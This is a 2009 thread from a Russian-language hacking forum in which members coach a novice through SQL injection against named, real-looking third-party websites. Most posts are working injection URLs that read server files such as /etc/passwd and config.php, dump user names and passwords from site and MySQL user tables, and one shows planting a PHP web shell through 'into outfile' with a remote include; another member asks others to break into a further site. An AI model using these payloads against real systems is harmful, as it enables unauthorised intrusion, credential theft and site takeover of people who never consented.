ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
16.02.2009, 16:57
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296
Репутация:
74
|
|
159932, спасибо, это и есть слепая инъекция? И если можно - объясните пожалуйста что значит and+1=0...
|
|
|
16.02.2009, 17:06
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
какая слепа????
Код:
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(version())),5,6,7,8,9/*
и вообще лей шелл:
Код:
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,unhex(hex(file_priv)),5,6,7,8,9+from+mysql.user/*
правда там сложновато будет  )
Код:
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9/*
Последний раз редактировалось Pashkela; 16.02.2009 в 17:14..
|
|
|
|
16.02.2009, 17:13
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296
Репутация:
74
|
|
Pashkela, спасибо и вам. Язнаю что такое unhex и hex. Но все же мне интерестно, что значит вот это: and+1=0? Я извеняюсь, в инъекциях я новичок, вот и хочу подучиться...
|
|
|
|
16.02.2009, 17:16
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью
https://forum.antichat.ru/thread104591.html
кстати вот еще довольно интересная инфо:
Код:
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_file(0x636F6E6669672E706870),5,6,7,8,9/*
а нужны данные из базы - только брут. Например SIPT4
Последний раз редактировалось Pashkela; 16.02.2009 в 17:20..
|
|
|
|
16.02.2009, 17:23
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296
Репутация:
74
|
|
Сообщение от Pashkela
просто вызываешь ошибку, 1 никогда не будет равен 0, вместо запятой или минуса, нарушаешь логику sql-запроса, способо много, от кавычки до or, читай статью
Спасибо, логично. Я пытался минусом и кавычкой, но не выводилось ничего.
http://www.yivo.org/index.php?tid=1+and+1=0+union+select+1,2,3,load_fi le(0x636F6E6669672E706870),5,6,7,8,9/*
Значит load_file работает? + Сервер на виндовсе стоит... + Расскрыте путей DB! Спасибо!
|
|
|
|
16.02.2009, 18:04
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от Pashkela
а нужны данные из базы - только брут. Например SIPT4
все гораздо банальнее
http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,userna me,5,password,7,8,9+from+users/*
Сообщение от Pashkela
и вообще лей шелл
интересно как)
правда, значение восьмой колонки участвует в другом запросе (8=username), но и там ковычки слешируются:
http://www.yivo.org/index.php?tid=1+and+null+union+select+1,2,3,4,5,6, 7,0x2d312920756e696f6e2073656c65637420312c322c332c 342c352c362c372c5c27785c272c392c31302c31312c31322c 31332c31342c31352c31362c31372c31382c31392c32302c32 312c32322c32332c32342c32352c32362c32372c32382c3239 2c33302c33312c33322c33332c33342c33352c33362c33372c 33382c33392c33302c34312c34322c34332c34352c34362c34 372c34382c34392c35302c35312c35322c35332c35342c3535 2c35362c35372c35382c35392c36302c36312c36322c36332c 36342c36352c36362c36372c36382c36392c37302c37312f2a ,9/*
2. Assembler вобще говоря, в таких случаях лучше всего рассматривать информативный текст (аля 0xlala)
вывод в исходниках:
http://www.auto24team.de/index.php?who=9999+union+select+1,1,concat_ws(0x3a ,user,password,host),1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1+from+mysql.user+limit+1,1--+
file_priv=y, и судя по выводу на серваке есть pma
Последний раз редактировалось jokester; 16.02.2009 в 18:12..
|
|
|
|
17.02.2009, 16:40
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Здравстуйет
Вопрос такой
В phpmyadmin`е сделал запрос вида
select '<? @include("http://__________/shell.txt"); ?>' into outfile '\htdocs\shelll.php'
вернул истину,при попытке обратится к файлу http://__________/shell.txt
пишет страница не существует!
|
|
|
|
17.02.2009, 17:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
into outfile '\htdocs\shelll.php'
при попытке обратится к файлу http://__________/shell.txt
а теперь подумай
|
|
|
|
17.02.2009, 18:01
|
|
Новичок
Регистрация: 12.09.2008
Сообщений: 13
Провел на форуме:
170978
Репутация:
1
|
|
http://www.allfun.md/index.php?page=type&id=sql
кому нечево делать помогите..
|
|
|
|
17.02.2009, 20:03
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
downloader
нету скули?
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [JavaScript]](/avatars/avatar76873.jpg?1119803){kind=avatar}
![Аватар для [JavaScript]](/avatars/avatar76873.jpg?1119839){kind=avatar}
![Аватар для [JavaScript]](/avatars/avatar76873.jpg?1119850){kind=avatar}
Линейный вид
